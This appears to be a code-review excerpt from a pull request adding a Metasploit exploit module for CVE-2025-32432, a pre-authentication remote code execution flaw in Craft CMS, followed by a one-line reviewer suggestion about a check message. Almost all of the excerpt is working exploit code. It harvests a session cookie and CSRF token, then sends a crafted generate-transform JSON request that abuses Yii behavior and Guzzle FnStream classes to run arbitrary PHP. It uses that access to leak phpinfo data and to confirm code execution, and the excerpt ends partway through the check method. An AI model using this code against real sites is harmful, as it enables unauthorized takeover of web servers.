modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb

```diff
@@ -0,0 +1,247 @@
+    session_id = res.get_cookies[/CraftSessionId=([^;]+)/, 1]
+    return nil if session_id.to_s.empty?
+
+    if res.code == 302 && res.headers['Location']
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri' => res.headers['Location'],
+        'keep_cookies' => true
+      )
+    end
+
+    csrf = extract_csrf_token(res)
+    return nil unless csrf
+
+    [session_id, csrf, param_name]
+  end
+
+  def extract_csrf_token(res)
+    doc = res.get_html_document
+    token = doc.at('//input[@name="CRAFT_CSRF_TOKEN"]/@value')&.text
+    return token unless token.to_s.empty?
+
+    vprint_status('CSRF not found in dashboard, falling back to root')
+    res2 = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'keep_cookies' => true
+    )
+    res2.get_html_document.at('//input[@name="CRAFT_CSRF_TOKEN"]/@value')&.text
+  end
+
+  def leak_session_path(csrf)
+    res = send_transform(csrf, datastore['ASSET_ID'], 'phpinfo')
+    return nil unless res&.body
+
+    doc = res.get_html_document
+
+    path = doc.at_xpath(
+      "//tr[td[@class='e' and normalize-space(text())='session.save_path']]/td[@class='v']"
+    )&.text
+
+    path ||= doc.at_xpath(
+      "//h2[normalize-space(text())='Session Save Path']/following-sibling::p[1]"
+    )&.text
+
+    path&.strip
+  end
+
+  def send_transform(csrf, asset_id, php_string)
+    json_data = {
+      'assetId' => asset_id,
+      'handle' => {
+        'width' => Rex::Text.rand_text_numeric(1..5),
+        'height' => Rex::Text.rand_text_numeric(1..5),
+        "as #{Rex::Text.rand_text_alphanumeric(1..8)}" => {
+          'class' => 'craft\\behaviors\\FieldLayoutBehavior',
+          '__class' => 'GuzzleHttp\\Psr7\\FnStream',
+          '__construct()' => [[]],
+          '_fn_close' => php_string
+        }
+      }
+    }.to_json
+
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'vars_get' => { 'p' => 'admin/actions/assets/generate-transform' },
+      'ctype' => 'application/json',
+      'headers' => { 'X-CSRF-Token' => csrf },
+      'data' => json_data
+    )
+  end
+
+  def check
+    _, csrf, = fetch_cookies_and_csrf
+    return CheckCode::Unknown('Could not retrieve session & CSRF') unless csrf
+
+    if (path = leak_session_path(csrf))
+      @session_path = path
+      print_good("Leaked session.save_path: #{@session_path}")
+      return CheckCode::Vulnerable('Session path leaked')
+    end
+
+    a = Rex::Text.rand_text_numeric(4).to_i
+    b = Rex::Text.rand_text_numeric(4).to_i
+
+    expr = "#{a}+#{b}"
+    sum = a + b
+    print_status("Checking RCE: #{expr}")
+
+    payload = "print_r(#{expr});"
+    res = execute_via_session(payload)
+    return CheckCode::Unknown('No response') unless res
+
+    if res.body.include?(sum.to_s)
+      CheckCode::Vulnerable("Detected RCE: #{sum}")
+    else
+      CheckCode::Safe("Sum #{sum} not found")
```

Comment:
```suggestion
      CheckCode::Safe("Unable to exercise code execution.")
```

Displaying `sum` doesn't tell the user much :P